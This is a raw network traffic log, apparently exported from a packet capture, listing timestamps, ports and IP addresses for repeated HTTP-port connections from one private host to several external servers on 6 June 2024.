Jun 6, 2024 13:26:50.729432106 CEST	49765	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:51.533891916 CEST	49765	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:52.553323984 CEST	49766	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:52.558531046 CEST	80	49766	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:52.561418056 CEST	49766	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:52.565318108 CEST	49766	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:52.570331097 CEST	80	49766	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:53.236579895 CEST	80	49766	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:53.270601034 CEST	80	49766	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:53.270648003 CEST	49766	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:54.065126896 CEST	49766	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:55.084444046 CEST	49767	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:55.089492083 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.089570045 CEST	49767	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:55.092530012 CEST	49767	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:55.097441912 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.097558975 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.097593069 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.097650051 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.097697973 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.097759962 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.097806931 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.097883940 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.097934008 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.766551018 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.798798084 CEST	80	49767	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:55.801430941 CEST	49767	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:56.599553108 CEST	49767	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:57.615150928 CEST	49768	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:57.620460987 CEST	80	49768	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:57.620552063 CEST	49768	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:57.622371912 CEST	49768	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:57.627290010 CEST	80	49768	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:58.284512043 CEST	80	49768	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:58.317145109 CEST	80	49768	162.0.237.22	192.168.2.4
Jun 6, 2024 13:26:58.317636967 CEST	49768	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:58.321314096 CEST	49768	80	192.168.2.4	162.0.237.22
Jun 6, 2024 13:26:58.326278925 CEST	80	49768	162.0.237.22	192.168.2.4
Jun 6, 2024 13:27:11.740355015 CEST	49769	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:11.745423079 CEST	80	49769	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:11.745496035 CEST	49769	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:11.747598886 CEST	49769	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:11.752582073 CEST	80	49769	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:12.430398941 CEST	80	49769	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:12.430469990 CEST	80	49769	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:12.430658102 CEST	80	49769	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:12.430689096 CEST	49769	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:12.430855036 CEST	49769	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:13.252849102 CEST	49769	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:14.272111893 CEST	49770	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:14.277123928 CEST	80	49770	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:14.277208090 CEST	49770	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:14.281341076 CEST	49770	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:14.286386013 CEST	80	49770	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:14.979567051 CEST	80	49770	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:14.985804081 CEST	80	49770	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:14.985845089 CEST	49770	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:14.986100912 CEST	80	49770	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:14.986138105 CEST	49770	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:15.783888102 CEST	49770	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:16.802171946 CEST	49771	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:16.807077885 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.807158947 CEST	49771	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:16.809150934 CEST	49771	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:16.813999891 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.814079046 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.814089060 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.814150095 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.814232111 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.814256907 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.814265966 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.814292908 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:16.814301014 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:17.503837109 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:17.504111052 CEST	80	49771	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:17.504175901 CEST	49771	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:18.317352057 CEST	49771	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:19.334608078 CEST	49772	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:19.339624882 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:19.339695930 CEST	49772	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:19.342073917 CEST	49772	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:19.347012043 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:20.017352104 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:20.017380953 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:20.017400026 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:20.017493963 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:20.017509937 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:20.017524004 CEST	49772	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:20.017667055 CEST	49772	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:20.018038988 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:20.018147945 CEST	49772	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:20.021332979 CEST	49772	80	192.168.2.4	136.143.180.12
Jun 6, 2024 13:27:20.026166916 CEST	80	49772	136.143.180.12	192.168.2.4
Jun 6, 2024 13:27:33.319470882 CEST	49773	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:33.324333906 CEST	80	49773	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:33.324393034 CEST	49773	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:33.326678991 CEST	49773	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:33.331482887 CEST	80	49773	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:34.010615110 CEST	80	49773	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:34.054949045 CEST	80	49773	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:34.055021048 CEST	49773	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:34.830785990 CEST	49773	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:35.849349976 CEST	49774	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:36.537007093 CEST	80	49774	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:36.537481070 CEST	49774	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:36.539280891 CEST	49774	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:36.544121981 CEST	80	49774	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:37.242130995 CEST	80	49774	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:37.283934116 CEST	49774	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:37.284552097 CEST	80	49774	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:37.284610033 CEST	49774	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:38.053414106 CEST	49774	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:39.068308115 CEST	49775	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:39.074188948 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.074268103 CEST	49775	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:39.076478004 CEST	49775	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:39.081410885 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.081667900 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.081682920 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.081736088 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.081764936 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.081831932 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.081871033 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.081883907 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.081899881 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.754112005 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.799508095 CEST	49775	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:39.800813913 CEST	80	49775	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:39.800988913 CEST	49775	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:40.580807924 CEST	49775	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:41.602926016 CEST	49776	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:41.608105898 CEST	80	49776	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:41.608191013 CEST	49776	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:41.611068010 CEST	49776	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:41.615999937 CEST	80	49776	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:42.289258003 CEST	80	49776	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:42.330239058 CEST	80	49776	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:42.333373070 CEST	49776	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:42.333544970 CEST	49776	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:42.337400913 CEST	49776	80	192.168.2.4	103.168.172.37
Jun 6, 2024 13:27:42.342289925 CEST	80	49776	103.168.172.37	192.168.2.4
Jun 6, 2024 13:27:47.430669069 CEST	49777	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:47.435631037 CEST	80	49777	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:47.435694933 CEST	49777	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:47.437482119 CEST	49777	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:47.442373037 CEST	80	49777	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:48.320847988 CEST	80	49777	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:48.362004042 CEST	49777	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:48.460772991 CEST	80	49777	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:48.463371992 CEST	49777	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:48.940201044 CEST	49777	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:49.958578110 CEST	49778	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:49.965097904 CEST	80	49778	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:49.965475082 CEST	49778	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:49.969362020 CEST	49778	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:49.975907087 CEST	80	49778	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:50.825208902 CEST	80	49778	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:50.877640963 CEST	49778	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:50.948965073 CEST	80	49778	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:50.949035883 CEST	49778	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:51.471436977 CEST	49778	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:52.489919901 CEST	49779	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:52.495174885 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.495313883 CEST	49779	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:52.497412920 CEST	49779	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:52.502532005 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.502563953 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.502618074 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.502645969 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.502674103 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.502706051 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.502763033 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.502790928 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:52.502819061 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:53.346728086 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:53.393249989 CEST	49779	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:53.470885992 CEST	80	49779	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:53.470952034 CEST	49779	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:54.005491018 CEST	49779	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:55.021116018 CEST	49780	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:55.026141882 CEST	80	49780	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:55.027539968 CEST	49780	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:55.028027058 CEST	49780	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:55.032910109 CEST	80	49780	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:55.882009029 CEST	80	49780	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:55.941415071 CEST	49780	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:56.005388021 CEST	80	49780	104.37.39.71	192.168.2.4
Jun 6, 2024 13:27:56.009475946 CEST	49780	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:56.013356924 CEST	49780	80	192.168.2.4	104.37.39.71
Jun 6, 2024 13:27:56.018271923 CEST	80	49780	104.37.39.71	192.168.2.4
Jun 6, 2024 13:28:09.326920033 CEST	49781	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:09.331971884 CEST	80	49781	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:09.332043886 CEST	49781	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:09.334309101 CEST	49781	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:09.339240074 CEST	80	49781	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:09.950978041 CEST	80	49781	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:09.951088905 CEST	80	49781	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:09.951337099 CEST	80	49781	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:09.951651096 CEST	49781	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:10.849391937 CEST	49781	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:11.864856958 CEST	49782	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:11.897022009 CEST	80	49782	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:11.897492886 CEST	49782	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:11.901386976 CEST	49782	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:11.906351089 CEST	80	49782	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:12.702299118 CEST	80	49782	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:12.702320099 CEST	80	49782	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:12.702330112 CEST	80	49782	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:12.702339888 CEST	80	49782	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:12.702390909 CEST	49782	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:13.409176111 CEST	49782	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:14.427504063 CEST	49783	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:14.432451010 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.432550907 CEST	49783	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:14.435389042 CEST	49783	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:14.440315008 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.440417051 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.440469980 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.440536976 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.440545082 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.440660000 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.440710068 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.440742970 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:14.440787077 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:15.076339006 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:15.076375961 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:15.076435089 CEST	49783	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:15.076634884 CEST	80	49783	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:15.076680899 CEST	49783	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:15.940427065 CEST	49783	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:16.959163904 CEST	49784	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:16.964109898 CEST	80	49784	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:16.964205980 CEST	49784	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:16.966166019 CEST	49784	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:16.971054077 CEST	80	49784	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:17.588023901 CEST	80	49784	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:17.588047981 CEST	80	49784	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:17.588188887 CEST	49784	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:17.588273048 CEST	80	49784	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:17.588326931 CEST	49784	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:17.591289997 CEST	49784	80	192.168.2.4	199.59.243.225
Jun 6, 2024 13:28:17.596117973 CEST	80	49784	199.59.243.225	192.168.2.4
Jun 6, 2024 13:28:41.835134029 CEST	49785	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:28:41.840396881 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:41.840475082 CEST	49785	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:28:41.842824936 CEST	49785	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:28:41.847801924 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.601919889 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.601975918 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602020025 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602123976 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602158070 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602180958 CEST	49785	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:28:42.602194071 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602330923 CEST	49785	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:28:42.602416039 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602449894 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602484941 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602617979 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.602659941 CEST	49785	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:28:42.603420973 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:42.603975058 CEST	49785	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:28:42.607702017 CEST	49785	80	192.168.2.4	172.65.176.239
Jun 6, 2024 13:28:42.612723112 CEST	80	49785	172.65.176.239	192.168.2.4
Jun 6, 2024 13:28:47.615559101 CEST	49786	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:47.621206999 CEST	80	49786	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:47.621284962 CEST	49786	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:47.623379946 CEST	49786	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:47.628952026 CEST	80	49786	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:48.293901920 CEST	80	49786	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:48.326241970 CEST	80	49786	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:48.329530001 CEST	49786	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:49.127846956 CEST	49786	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:50.146161079 CEST	49787	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:50.151217937 CEST	80	49787	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:50.153532982 CEST	49787	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:50.157424927 CEST	49787	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:50.162338018 CEST	80	49787	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:50.810741901 CEST	80	49787	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:50.844193935 CEST	80	49787	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:50.845487118 CEST	49787	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:51.660213947 CEST	49787	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:52.677509069 CEST	49788	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:52.682674885 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.682856083 CEST	49788	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:52.685444117 CEST	49788	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:52.690583944 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.690615892 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.690650940 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.690702915 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.690736055 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.690785885 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.690815926 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.690926075 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:52.690953016 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:53.337840080 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:53.372860909 CEST	80	49788	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:53.372914076 CEST	49788	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:54.190269947 CEST	49788	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:55.208791018 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:55.213913918 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:55.214035034 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:55.215828896 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:55.220797062 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:55.885118008 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:55.918371916 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 6, 2024 13:28:55.918481112 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:55.919450045 CEST	49789	80	192.168.2.4	162.241.216.140
Jun 6, 2024 13:28:55.925159931 CEST	80	49789	162.241.216.140	192.168.2.4
Jun 6, 2024 13:29:00.927690983 CEST	49790	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:00.932693958 CEST	80	49790	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:00.935368061 CEST	49790	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:00.935368061 CEST	49790	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:00.940318108 CEST	80	49790	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:01.598417044 CEST	80	49790	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:01.639224052 CEST	80	49790	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:01.639300108 CEST	49790	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:02.441538095 CEST	49790	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:03.864809036 CEST	49791	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:03.870006084 CEST	80	49791	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:03.870088100 CEST	49791	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:03.871691942 CEST	49791	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:03.876549959 CEST	80	49791	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:04.529423952 CEST	80	49791	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:04.574980974 CEST	80	49791	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:04.575129986 CEST	49791	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:05.377866983 CEST	49791	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:06.403645039 CEST	49792	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:06.408674955 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:06.408754110 CEST	49792	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:06.411331892 CEST	49792	80	192.168.2.4	57.151.38.169
Jun 6, 2024 13:29:06.416296005 CEST	80	49792	57.151.38.169	192.168.2.4
Jun 6, 2024 13:29:06.416337967 CEST	80	49792	57.151.38.169	192.168.2.4
